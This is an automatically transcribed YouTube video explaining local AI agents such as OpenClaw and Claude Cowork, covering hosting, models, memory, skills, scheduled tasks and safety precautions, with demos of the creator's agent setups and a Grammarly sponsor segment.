LongCut logo

Local AI Agents In 26 Minutes

By Tina Huang

Summary

Topics Covered

  • Highlights from 00:00-05:12
  • Highlights from 05:01-10:32
  • Highlights from 10:28-15:58
  • Highlights from 15:54-21:43
  • Highlights from 21:35-26:02

Full Transcript

I learned all about local AI agents for you. So, here is the cliffnotes version

you. So, here is the cliffnotes version to save you the months that I have spent playing around and building with local AI agents like OpenClaw Nemo. Look,

here's my little 24/7 claw factory doing research and building me software. So

cute, right? And also no code safer options like anthropics claed moons to actually make this video cuz I wanted to be 100% sure that this is not just like a hype thing, right? I am now

100% convinced that local AI agents is a new category of AI products that honestly in the past few months has highkey transformed my daily workflows.

Now, without further ado, let's go. A

portion of this video is sponsored by Grammarly. All right, here is the

Grammarly. All right, here is the outline of today's video. First, we're

going to define what local AI agents are, including the anatomy of a local AI agent and how to custom design your own.

This is where the majority of people fail to get the most of their local AI agents cuz they don't actually understand how to design them properly.

I'll also cover some principles and tips including how to deal with safety and good engineering principles. Then we

shall make this very concrete. I will be showing you demos of code and no code versions of local AI agents specifically openclaw and also claude co-work. And

finally, I will end with some thoughts on how to take advantage of this new category of local AI agents because this is just the beginning and represents massive opportunities. Let's now

massive opportunities. Let's now actually define what a local AI agent is. First and foremost, it is an AI

is. First and foremost, it is an AI agent, which is an AI that can take actions and complete tasks on its own.

AI agents are nothing new. They've been

around for over 2 years now. But what

makes it really exciting and more powerful these days is that it's also local. Local meaning that the agent is

local. Local meaning that the agent is able to live and run on your personal machine. So, a local AI agent is an AI

machine. So, a local AI agent is an AI that takes action and completes tasks on its own while running directly on your machine. So, we can do things like send

machine. So, we can do things like send you a very personalized morning brief of your calendars, your emails, priorities, stock portfolio, notes, and news that you're interested in. For me, my local AI agents are also constantly

researching ways for me to improve my business and then autonomously build out software to implement these things, too.

For example, my local AI agents have built me a personal finance tracker, accounting software, a dashboard that tracks our boot camp students and their performance and their progress, and some trading bots. Not financial advice, it's

trading bots. Not financial advice, it's just a personal hobby I have. You can

also remotely interact with your local AI agents, like communicate with them, monitor what they're doing through your phone as well, so you don't have to be sitting there at your computer. There

are so many different use cases, and I'm just going to put on screen some of the most useful ones in my opinion. So, take

a screenshot when you're ready to build your own later. Now, I want to show you the components, the anatomy of a local AI agent so you can custom build your own. So, picture this little guy is your

own. So, picture this little guy is your local AI agent. It name is Inky, and we are now going to build and customize it.

The first thing we need to do is decide where it lives. We know that it's a local agent, meaning that it lives on your machine. But there are a lot of

your machine. But there are a lot of different types of machine it can live on, like your personal laptop, a old laptop, a Mac Mini or Mac Studio, a PC, or even a VPS, which stands for virtual

private server. It's like renting

private server. It's like renting somebody else's computer on the cloud.

In my opinion, there are three key factors to determine where you should be running your local AI agent. The first

one is if you want your local AI agents to be continuously running 24/7. So, you

would need to have something that's running 24/7. So something like your

running 24/7. So something like your laptop which you carry around with you wouldn't work. Then you need to consider

wouldn't work. Then you need to consider your machine specs. Things like what kind of chip it has, CPU, GPU, but most importantly RAM memory because if you want your local AI agents to be powered

with really big open- source models, we'll get to that in a little bit about different models, but basically you need to have a machine that's able to handle running these models. So something like your everyday computer probably wouldn't

cut it. And the third factor is privacy

cut it. And the third factor is privacy security. How paranoid are you about

security. How paranoid are you about your local AI agent having access to your things? Unfortunately, there have

your things? Unfortunately, there have been stories of people who install their local AI agents on their like personal laptop, not put in the right guard rails, and it has like access to all of your stuff and it like deletes your

emails potentially could like do not great things because it has access to everything.

Oh no. So, if you're very particularly paranoid, like I am actually, then you probably want to have a machine that is just dedicated for your local AI agent and it doesn't have access to all of the stuff you don't want it to have access

to. So, me personally, when I first

to. So, me personally, when I first started playing with OpenClaw specifically, I went with a old laptop like this one here that I completely wipe so there's nothing on there anymore and I have it on 24/7 completely

dedicated to my local AI agent. Because

this old MacBook Pro only has 16 gigs of RAM, I mostly just use Claude Sonnet and Claude Opus models instead of big open source models cuz that wouldn't be enough RAM. Again, I'll explain a little

enough RAM. Again, I'll explain a little bit more about models later in the video. But yes, after playing around and

video. But yes, after playing around and building stuff more seriously, also started using a Mac Mini, which is a dedicated machine that also has better hardware, so then I can start running bigger open source models, too. I also

have one on a MTS, and I actually just ordered a Mac Studio as well because I'm like really into local AI agents. So

yes, that's just my setup, my hardware machine journey. There are a lot of

machine journey. There are a lot of other options. I'm actually going to put

other options. I'm actually going to put on screen some hardware and machine specs and what kind of models and what kind of AI agents you can be running.

And I'm actually going to put a prompt in the description as well that you can paste into your favorite AI chatbot like Claude or CHPT and it'll actually help you figure out what kind of hosting option is the most suitable for you. I

got you. I know like hosting and hardware and stuff like that is a really big blocker for a lot of people to play around with local AI agents. Okay,

great. Now that we talked about all the different places that our local AI agent, Inky, lives, let us now actually customize other parts of it. Let's start

off by giving your local AI agent, Inky, a mouth and ears, aka a communication channel. So, you know, you can actually

channel. So, you know, you can actually talk to Inky and Inky can talk back to you. This is also what allows you to

you. This is also what allows you to talk to it remotely with your phone as well. So, there are actually a lot of

well. So, there are actually a lot of thirdparty communication options, many of which you probably already use and know of like Telegram, Discord, WhatsApp, iMessage, Slack, and Dispatch.

The easiest one to get started with is just single channel messaging and telegram is usually the option people go for or dispatch if you're using cloud core. Then as time goes on and you get a

core. Then as time goes on and you get a little bit more advanced, you got like multiple things going on with your local AI agent, you probably want to graduate using something like Discord that has multiple channels there that you can stay more organized. I will actually

show you what this looks like in the demo later, but just for now know that there are a lot of different options available. Okay, great. Our local AI

available. Okay, great. Our local AI agent, Inky, now has a mouth and ears communication channel. Next up, we need

communication channel. Next up, we need to give it a brain and memory. Let's

first start off with the brain, which is the large language model, the AI model that would power it. There are a lot of different options you can choose from like cloud models, opus and sonnet, open AI models, and of course, open source

models too like Quen and Kimmy and Miniax and Deepseek. Different kind of model have different kinds of trade-offs like capabilities, size, speed, cost, and privacy. I actually made an entire

and privacy. I actually made an entire video which you can check out over here that goes through the different types of models out there. But TLDDR, the most popular options for local AI agents is Claude Opus or Claude Sonnet. And on the

open source side, Quinn and Kimmy are the most popular. I'm going to put on screen now some different types of models and what they're commonly used for, what they're best for to help you make a choice on which one you want to use. So take a screenshot. Okay, great.

use. So take a screenshot. Okay, great.

So the model is your brain, but you also have to give it memory. So it can know things about you and can remember what it is that it's doing. This is probably a lot simpler than you would expect.

memory is literally just a bunch of text files and you just dump in there document everything that you want Inky you want it to know stuff about it who it is what personality type what it's supposed to be doing what kind of

workflows it has what kind of data that it has and information about you the user what's your workflows what's your personality type what do you care about what's your demographic what's your job this is what gives it the ability to be

very personalized to you and what you want it to do and as it's completing a task like I don't know doing some research about stocks it would be writing down what it's doing. So in the future when you talk to it about these stocks, it would know what you're

talking about. The good thing is that

talking about. The good thing is that most local AI agent software and frameworks like open claw and co-work do already have some type of memory system that's pre-built in it. But people who are like power users do like to do things like boost the memory system to

make it more robust and organized by using things like Obsidian for example.

I will also be showing you this in the demo later. Great. Let's now give your

demo later. Great. Let's now give your local AI agent Inky some more tentacles.

Tentacles represent skills and tools.

The good thing is that Inky, it already comes with some pre-built tentacles. So,

it can already do some basic things like search your files, execute code, things like that. But depending on what it is

like that. But depending on what it is that you want it to do, you want to give it more abilities, more tools that it can use and more skill sets that it can have. This can include things like web

have. This can include things like web search, being able to access your email, take screenshots, text to speech, image generation, etc., etc. Wow. Okay. Next

up, let us give our local AI agent, Inky, a heartbeat. What it is is that allows you to schedule task so that Inky would run without you asking it to do so. Like every 30 minutes, it's supposed

so. Like every 30 minutes, it's supposed to scan for a new email. Every month, it should be scheduling a doctor's visit.

Or it can be time based called a cron job. So every morning at 7:00 a.m., it

job. So every morning at 7:00 a.m., it

sends me my morning briefing. It can

also be event based, like every time a file gets added to my accounting folder, it would run my accounting workflow and put it into the books. These are such game changers. I'm going to put on

game changers. I'm going to put on screen now some of my favorite ones.

Yay. Inky now has all of its body parts except one last thing, eyes. Having eyes

would allow your local AI agent to be able to see what is actually happening on your computer and interact with it like a human would. So it can do things like check what's in your folders and in

some cases actually be able to see what's happening on your screen and be moving your mouse and actually doing stuff on your screen for you. Here are

some other examples that that Inky would be able to do if it has eyes. All right,

we have now finished building Inky. Inky

has all of its body parts. Now, I'm

going to put on screen now a little diagram that shows the anatomy of a local AI agent. Take a screenshot, which will become immediately useful because time for a little quiz. Please answer

the questions displayed on screen now to make sure that you are retaining all the information. Now that you have your

information. Now that you have your custom little designed Inky, your custom local AI agent, there is actually no reason for you to only have just one of these. You can actually have multiples

these. You can actually have multiples of them. You can get your little local

of them. You can get your little local AI agents to be doing multiple tasks at the same time or you can put them into teams where each of them has a specific function and added together they're able to produce something that is greater

than the sum of its parts. For example,

I have a research team that is looking into stocks that I might be interested in buying. And I also have a software

in buying. And I also have a software team that is researching and making product decisions and building software for my company. They can be doing multiple things at the same time. One of

them is doing research. One of them is managing your calendar. One of them is writing a marketing campaign for your job. So, there are specific principles

job. So, there are specific principles for designing these multi-agentic systems, which I'm not going to go into too much more detail in this video cuz it's there's like a lot going on there as well, but I actually did make a video where I cover multi- aent system

designs, which you can check out over here. As a YouTuber and entrepreneur, my

here. As a YouTuber and entrepreneur, my workday is all over the place. One hour

I'm deep in the codebase, the next I'm writing a video script, and then I'm writing a LinkedIn post. The writing

never stops. and the context switching, getting started on things, the cold star problem is brutal. So that is why I use Superhuman Go to stay on top of everything. Superhum Go, which is from

everything. Superhum Go, which is from the makers of Grammarly, is an AI partner that works inside apps and websites that you already use, proactively making suggestions to use your work without you even asking. Let

me show you how I use it. First, turn on Superhuman Go within your Grammarly browser extension and select the Go icon on the side of your screen and it just shows up. If I'm looking at a LinkedIn

shows up. If I'm looking at a LinkedIn post draft or a creative brief, I can ask Go to summarize it or help me understand exactly what's being asked without opening a separate tool. I

really love that it just shows up wherever I'm working and I don't have to open up a separate tool. My favorite

feature is reader reactions. As a

creator, I am always wondering will what I say actually land while reader reactions predicts how your audience will respond before they even see it. It

flags where they might get confused, what questions they'll ask, and suggest revisions to make my writing more effective. I use it on everything from

effective. I use it on everything from scripts to client emails. You can also connect external agents like Google Calendar or Slack directly inside Go so everything lives in one place without having like five different tabs open. So

if you're a professional juggling a million types of writing every day, this tool is for you. Try Superhum Go to level up your productivity at work. The

link is in the description. Thank you so much Grammarly for sponsoring this portion of the video. Now back to the video. Okay, so before I go into demos

video. Okay, so before I go into demos now I do also want to cover two final principles that I think is very important as you are building and working with your local AI agents. The

first one is the safety. Safety is the primary concern for using local AI agents because you're basically giving this very intelligent agent access to your computer and hoping that it's not going to just go bananas. So that's why

you need to take precautions to make sure that your local AI agent doesn't just like ruin your life. There

unfortunately have been stories of these of local AI agents deleting people's emails or having viruses in them because of like skills being shared, things like that. So yes, always keep safety in

that. So yes, always keep safety in mind. And the way that I think about it

mind. And the way that I think about it is first of all I try to isolate uh the local AI agent as much as possible which is why I don't run them on my primary machine that actually has all my data. I

only run them on dedicated machines where there's no sensitive information that I can have access to. I'm also very careful about what I give it access to.

Like it does have access to some of my emails where I want it to be screening emails but I don't actually give it access to my personal emails, the ones that actually has like very sensitive information on it. I use other emails

for that. I create new emails and I also

for that. I create new emails and I also don't trust other people's workflows.

Like people would write workflows that document doing a specific process like writing a marketing campaign, right? And

these are like really useful, but there could also be like malicious things that's put into it where if my local AI agent gets access to it, it might cause it to go bananas. So, I generally just

don't use other people's skills unless it's from very trusted developers. And

if I do want to use a skill, I think it's actually a really good skill that somebody else made, I would actually just give the skill to Claude and tell it to scan the skill and then rewrite itself and then give it to my local AI agent. General rule of thumb is just to

agent. General rule of thumb is just to be as paranoid as possible. And finally,

local AI agents, like if you're using OpenClaw, for example, they do have like dedicated security things that it tells you to go and check. So what I actually do is use my AI agents heartbeat ability

and run a security audit like every hour or minimally every day. Now if you do choose to use something like cloud co-work for example the good news is that a lot of these security functions are already pre-baked into it so you

don't need to worry as much. Now the

second principle that I would like you to keep in mind is good engineering principles specifically to always be giving clear instructions as much as possible for what it is that you want your local AI agent to be doing or

building and only adding one feature or workflow at a time so it's easier to track and monitor. Don't be like, "Hey, Inky, build me like five things at the same time." No, cuz then if something

same time." No, cuz then if something does go wrong, you don't even know what's what's up, you know? You don't

even know what's going on. Very chaotic.

All right, it is time for demos. I'm so

excited. Starting off with OpenClaw. I

want to show you guys how I implement all of these components that we just covered and the custom stuff that I'm doing with it. All right, cool. Time for

the OpenClaw demo. So, here we have the agent office where you can visually see all the agents and what it is that they're doing and how they're interacting with each other as well. Uh,

by the way, the visual here, this is what you're seeing here is a custom tool called the emission control. It allows

me to monitor what the agents are doing and then also like other tabs as well, which I will show you guys in a little bit. But first, let's talk about the

bit. But first, let's talk about the team that's here. So, here's the mission of the team, what everybody is working towards. And there's me, so I'm the

towards. And there's me, so I'm the founder, a CEO, and I'm also the human.

There's Inky, who's chief of staff. We

can see that Inky is using the Claude Sonnet 4.6 model as the central brain.

Then we have the content pipeline. So

that's Blinky, Pinky, and Dinky. It's an

autonomous content pipeline in which, yes, I will show you in a little bit. I

think it's pretty cool. These are all using the set models too. Then we have Linky, which is the builder decoder. So

every time we need to build software, do stuff with code that would be routed to Linky. So Linky has two models that it

Linky. So Linky has two models that it uses. The Cloud Opus 4.6 model, which is

uses. The Cloud Opus 4.6 model, which is for planning, architecture, and more like intense coding stuff. It also has Quen Coder 2.5. This is an open- source model that actually lives on the

computer, so it's completely free. And

linky would route any more mechanical coding task to Quen coder because that's a way to optimize cost right because cloud opus is really expensive to be running all the time. Then we have Winky which is a system monitor. It runs twice

a day and it just basically does a health check to make sure all systems are up and running. There's no security issues and it uses the mini stroll 3B model. It's also a very small local

model. It's also a very small local model that is free in order to do this.

By the way, all of this all of the agents and then the models as well. This

is all on a secondary laptop that I have. So that is the home for this open

have. So that is the home for this open claw setup. I have many openclaw setups,

claw setup. I have many openclaw setups, but for this one, it's actually all just running on a MacBook Pro laptop with 16 gigs of RAM. I'll actually put on screen the stats for this MacBook if you are curious. So let me actually show you the

curious. So let me actually show you the full content pipeline. So this is actually done on Discord, which is the communication channel that I use to interact with all of the agents. There

are different channels that represent different things it's doing, current projects, and different alerts that I get from different agents as well. way

that the content pipeline works is that I get a morning brief that gives me the top stories of things I'm interested in, which is basically like AI stuff, and then it goes and updates my topic watch list. So, this is how it is that I

list. So, this is how it is that I actually track different topics to decide when I should make a video about it. And it also gives me some video

it. And it also gives me some video ideas as well. It would also take these video ideas and put them into the content ideas channel here. Look at

these content ideas. I'm like, hm, if I like any of them, I can go on my mission control and look at the content tab. I

look at the content ideas that is also over here. So, say that I like something

over here. So, say that I like something AI agent memory expand. I'm like, oh, okay, I'm going to actually do this one.

So, I can click it and it goes into my content ideas and then I can click approve or pass. So, in this case, I have approved local AI in 10 minutes and also AI infrastructure explained. And we

can actually see here it routes to the YouTube long form channel and it gives me a working title, the topic, some ideas and some bullet points about it as well. And then I'm able to get the video

well. And then I'm able to get the video outline for it. AI Asian memory explained in 28 minutes. It would give me um some bullet points about how it is. I can structure the video, etc.,

is. I can structure the video, etc., etc. Of course, I still need to actually flush this out myself and like cross reference, check a bunch of things.

Takes me a very long time to actually make a video, but this is a really good starting point. So to do this I blinky

starting point. So to do this I blinky pinky and dinky of course need to use a bunch of tools. So we can actually ask what tools are being used for the daily

digest to content pipeline and it tells us we have web search xl etc etc tlddr. These are the tools that we're using.

Another way to get different types of tools and skills is to go on cloud hub over here which is where people share different skills that you can download and use as well like self-improving

agent ontology skill veter etc etc github weather blah blah blah me personally I don't actually download things from cloudub unless it's like literally by the founder like Pete Sebber for example because there was

this whole like security risk and scam situation through claw hub previously so I'm just being paranoid but what you can do is like say you like this you can click on it and then you can actually just give this to inky and then just tell it to build the skill itself

without having to download it directly.

Cool. So, here is a board that shows all the tasks that we're doing, what I'm doing, what everyone's doing, what Inky is doing, what Tina is doing, as well as an activity log. Here are some of the jobs that are being scheduled and the

projects that I'm currently working on as well. Oh, another thing that I asked

as well. Oh, another thing that I asked my Inky to do is that every night it would build something by itself that is delightful for one of the current projects that I'm working on. So, when I wake up, I'm able to like see something

new that I built. Like for example, last night I built what AI skill should you learn next. It's like an MVP for a

learn next. It's like an MVP for a microsass and it's just like this little quiz that I built that's able to help you determine like a personalized AI learning road map. Am I going to use it?

Am I not? I don't know. Uh but it's really fun waking up every morning to see something that gets autonomously done. And sometimes I actually do like

done. And sometimes I actually do like the idea and I start building on top of it too. Another thing is memory. So I do

it too. Another thing is memory. So I do get Inky to aggressively document everything it does. So here you can see all the docs that it writes for everything that it builds. And you also have the daily logs, everything it's

doing every single day and it's long-term memory as well, which is memory.md. And since inky has eyes, one

memory.md. And since inky has eyes, one of its task every day is also to see all the changes that have been made and then aggressively document everything to make sure that nothing is left undocumented.

I also have this on Obsidian here, so you can also read it through like Obsidian if you want, which is lowkey pretty cool. I'm probably also going to

pretty cool. I'm probably also going to work on this to develop it into a more robust memory system that would also function as a second brain for myself.

So yeah, this is my current well one of my current openclaw setups. There's a

lot more I can talk about. So let me know if you want me to make a more dedicated openclaw video. I am happy to do so. So cool. That was openclaw. I

do so. So cool. That was openclaw. I

also want to show you a safer noode option which is claude coowork. So

claude coowwork is also a local AI agent and is anthropic take on local AI agents. It's a lot safer and it's a lot

agents. It's a lot safer and it's a lot easier to use. So I really recommend it for people who are not comfortable at all with code or just starting out. But

of course, the downside is that you do get locked into anthropic system and there's less ways for you to customize things. But still, I think it's a really

things. But still, I think it's a really good option if you're just starting out.

Welcome to the Claude Co-work demo. So,

here we had Claude desktop and this is the central hub for co-work. You can see the different models that are available over here. Obviously, they are all

over here. Obviously, they are all anthropic models and you can tell it stuff. Hi. The interface that you can

stuff. Hi. The interface that you can see is very similar to how you would usually chat with a chatbot and you can chat with it on mobile through dispatch as well, which I'll show you guys in a little bit. But first, let me explain

little bit. But first, let me explain how all this works. So cloud co-work lives on your computer and it basically corresponds to a folder on your computer. In this case, I'm using my

computer. In this case, I'm using my personal laptop because I do trust cloud co-work more than I do open cloth and like not revealing all my passwords and destroying my life. So yes, it's over here and it also has these memory files

which is claw.md and memory.mmd which I like to look at through obsidian. So

here we can see that information about me. This is Tina's co-workplace blah

me. This is Tina's co-workplace blah blah blah memory system and things about me. So going back to the file system,

me. So going back to the file system, I've made separate folders for different projects like content studio, portfolio, lonely, octopus, and personal. So why do we look at portfolio right now? This is

my investment portfolio, by the way, and it has a portfolio dashboard. So say I want to ask questions about my portfolio. I can choose the project

portfolio. I can choose the project portfolio folder and I can ask it some questions like what is my top? We'll use

the sonnet model and we'll say let's go.

Cool. And it tells me that apparently my best performing winner is on the Hong Kong stock exchange. Pop quiz. Does

anybody know which stock this is? Not

financial advice, okay? Please, please,

please. Not financial advice. In fact,

I'll also show you what's my biggest loser cuz I also lose too. There you go.

My China AI names are all underwater.

Got to stay honest. Now, that's cool and stuff. You can build out projects, but

stuff. You can build out projects, but what's really cool is that you also have access to Claude code, which is also on this hub. For example, one of the things

this hub. For example, one of the things it built me is this investments dashboard. So, it actually shows me some

dashboard. So, it actually shows me some of my investment portfolio and information about it and it updates by itself as well. has some positions, research about segments I care about, and a watch list that I have here as well. The way you do this is, of course,

well. The way you do this is, of course, through a combination of Claude code.

You also have access to other types of tools, including skills and connectors.

Not going to go into too much detail about what these are, but basically you can have lots of different apps that you can work with. So, say you want to pull from your Google Drive, Google calendar, you can do that. And also have automated workflows. Plugins are basically

workflows. Plugins are basically combinations of skills and connectors for a specific purpose. Like under

finance plug-in you have skills like different audits, close management, etc., etc. And under connectors, you have different apps like Google calendar, Gmail, Microsoft 365, etc. There's so much that you can do with

this as well. Don't have time to talk about it right now though. Let's see. I

also want to show you the scheduled tasks, which is the heart of your AI agent. So, in my case, some of my

agent. So, in my case, some of my scheduled tasks would include every day at 8:00 p.m. doing a daily investment deep dive, portfolio, daily briefing, and daily macro briefing as well. This

is all reflected in the investments dashboard that I built. Okay, so finally I want to show you guys Cloud Co's eyes, aka computer use, which is arguably one of the most visually cool features from

Cloud Co. and I'll be doing this through

Cloud Co. and I'll be doing this through mobile. So say for example, I'm out and

mobile. So say for example, I'm out and about and I need a file on my local computer except I'm out about. So I'm

only on mobile. What I can do is actually go on mobile and ask, can you send over the Discord PNG file? I know I

want this file here. Yes. Click send. It

will do its thing. Can allow it permissions. And it's able to send it to

permissions. And it's able to send it to you. And you're able to on mobile have

you. And you're able to on mobile have access to it now and do whatever you need. So, it didn't really do computer

need. So, it didn't really do computer use here. Let me try again. Can you take

use here. Let me try again. Can you take a screenshot of it? And yeah, it's literally using your computer and doing stuff with it. That's so crazy. It's

searching.

Opens it and it sends you a screenshot which you can see over here. So yeah,

pretty cool, right? There's of course so much more that you can do with a cloud co-work system as well. I personally

actually use cloud co-work and open claw at the same time and like some other agents too, like many different local AI agents for different use cases. All

right, final section. I want to talk about some predictions about the development of these local AI agents and the things that you should be learning to take advantage of this new category of AI product because it represents

massive opportunities. It's not just me

massive opportunities. It's not just me that's saying this, by the way. Check

out this clip. This is Jensen Hang from Nvidia.

The implication is incredible. First of

all, the adoption says something in all in itself. However, the most important

in itself. However, the most important thing is this. Every single technology company for the CEOs, the question is what's your open claw strategy?

He's basically saying that companies all need to have an open claw strategy. Now,

a personal local AI agent strategy.

Every single SAS company would become a gas company, an agentic as a service company. as he explains, there are so

company. as he explains, there are so many opportunities out there for your personal workflows and for your business workflows. My recommendation if you're

workflows. My recommendation if you're someone who wants to take advantage of this rise of local AI agents is to actually learn to build your own AI agents too. Like yes, play around with

agents too. Like yes, play around with OpenClaw and set up these different local AI agents. But if you understand how to also build your own agents, this is so much more powerful, especially in combination if you learn how to do AI

coding. Like oh my gosh, if you know how

coding. Like oh my gosh, if you know how to use these local AI agents, you know how to build your own agents and set up systems for it and also know how to do AI coding so you can augment these local

AI agents too. That combination is so overpowered like the world is your oyster. All right, so that is the end of

oyster. All right, so that is the end of this video. As promised, here is a final

this video. As promised, here is a final little assessment. Please answer the

little assessment. Please answer the questions displayed on screen now to make sure that you're retaining all the information that we just talked about and you're ready to start doing stuff with your own local AI agents. Thank you

so much for watching until the end of this video and good luck and have fun.

Loading...

Loading video analysis...